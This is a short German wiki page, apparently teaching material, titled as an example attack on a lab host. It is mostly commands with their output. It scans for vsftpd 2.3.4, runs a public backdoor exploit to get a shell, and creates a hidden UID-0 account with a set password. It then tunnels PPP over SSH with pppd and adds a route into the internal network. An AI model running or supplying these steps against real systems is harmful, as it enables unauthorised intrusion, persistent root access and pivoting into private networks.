Exemplarischer Angriff

Aus Xinux Wiki

Version vom 7. Oktober 2021, 19:00 Uhr von Thomas.will (Diskussion | Beiträge) (→‎Vpn-Hack)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

Angreifer

Scan

nmap -sV 10.80.100.105 -p 21

Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST
Nmap scan report for 10.80.100.105
Host is up (0.00056s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
Service Info: OS: Unix

Nach Exploit googlen

vsftpd 2.3 4 exploit-db

Exploit finden

https://www.exploit-db.com/exploits/49757

Exploit ausführen

python vsftp.py 10.80.100.105

Success, shell opened
Send `exit` to quit shell

Opfer

Läuft ssh?

netstat -lntp | grep 22

tcp6  0      0 :::22   :::*  LISTEN      4360/sshd

User anlegen

useradd -m -o -u 0 -s /bin/bash -d /tmp/www www
passwd www

Enter new UNIX password: www2www
Retype new UNIX password: www2www
passwd: password updated successfully

VPN einrichten um Zugriff zum Netz zu erlangen

apt-get install ppp

Angreifer

Vpn-Hack

pppd updetach noauth passive pty "ssh -P 10.80.100.105 -p 22 \

-o Batchmode=yes pppd nodetach notty noauth" ipparam vpn 172.29.29.2:172.29.29.1

ip route add 10.80.100.0/24 via 172.29.29.1

Abgerufen von „http://wiki.ixheim.de/index.php?title=Exemplarischer_Angriff&oldid=28725“